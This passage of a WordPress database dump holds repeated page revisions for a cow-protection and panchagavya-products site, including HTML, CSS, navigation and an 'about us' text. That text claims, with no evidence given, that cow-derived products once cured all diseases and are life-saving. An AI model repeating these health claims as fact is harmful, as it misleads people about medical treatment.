the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 15:31:39','2022-10-19 10:01:39','',1373,'https://gopalak.in/?p=1865',0,'revision','',0),(1867,1,'2022-10-19 15:39:27','2022-10-19 10:09:27','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #FFFE71;\n}\n#page {\n	background-color: #c7f6b6;\n}\n#site-header {	\n	background:#c7f6b6;\n}\nheader {\n    background: #fff;\n}\n\n.below-header-bar {\n    height: 62px;\n}\n\n.top-header {\n    border-bottom: solid;\n    border-bottom-width: 0px;\n}\n\n.top-header, .main-header, .below-header {\n    position: relative;\n}\n\n.top-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #c7f6b6;\n}\n\n.top-header .top-header-bar {\n    line-height: 45px;\n}\n\n/*below header special css*/\n.below-header-col1 {\n    float: left;\n    width: 21%;\n}\n\n.below-header-col3 {\n    float: left;\n    width: 22%;\n}\n\n.below-header-col2 {\n    width: 57%;\n    float: left;\n    text-align: center;\n}\n\n.main-header:before, .below-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #43693F;\n}\n//#96ff00\n//#FFDF00','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-10-19 15:39:27','2022-10-19 10:09:27','',1172,'https://gopalak.in/?p=1867',0,'revision','',0),(1868,1,'2022-10-19 15:43:56','2022-10-19 10:13:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 15:43:56','2022-10-19 10:13:56','',1816,'https://gopalak.in/?p=1868',0,'revision','',0),(1869,1,'2022-10-19 15:43:56','2022-10-19 10:13:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 15:43:56','2022-10-19 10:13:56','',1816,'https://gopalak.in/?p=1869',0,'revision','',0),(1870,1,'2022-10-19 15:43:56','2022-10-19 10:13:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 15:43:56','2022-10-19 10:13:56','',1816,'https://gopalak.in/?p=1870',0,'revision','',0),(1871,1,'2022-10-19 15:44:55','2022-10-19 10:14:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','aboutus','','inherit','closed','closed','','1804-revision-v1','','','2022-10-19 15:44:55','2022-10-19 10:14:55','',1804,'https://gopalak.in/?p=1871',0,'revision','',0),(1872,1,'2022-10-19 15:44:55','2022-10-19 10:14:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','aboutus','','inherit','closed','closed','','1804-revision-v1','','','2022-10-19 15:44:55','2022-10-19 10:14:55','',1804,'https://gopalak.in/?p=1872',0,'revision','',0),(1873,1,'2022-10-19 15:44:55','2022-10-19 10:14:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','aboutus','','inherit','closed','closed','','1804-revision-v1','','','2022-10-19 15:44:55','2022-10-19 10:14:55','',1804,'https://gopalak.in/?p=1873',0,'revision','',0),(1874,1,'2022-10-19 17:56:27','2022-10-19 12:26:27','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 17:56:27','2022-10-19 12:26:27','',1816,'https://gopalak.in/?p=1874',0,'revision','',0),(1875,1,'2022-10-19 17:56:27','2022-10-19 12:26:27','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, 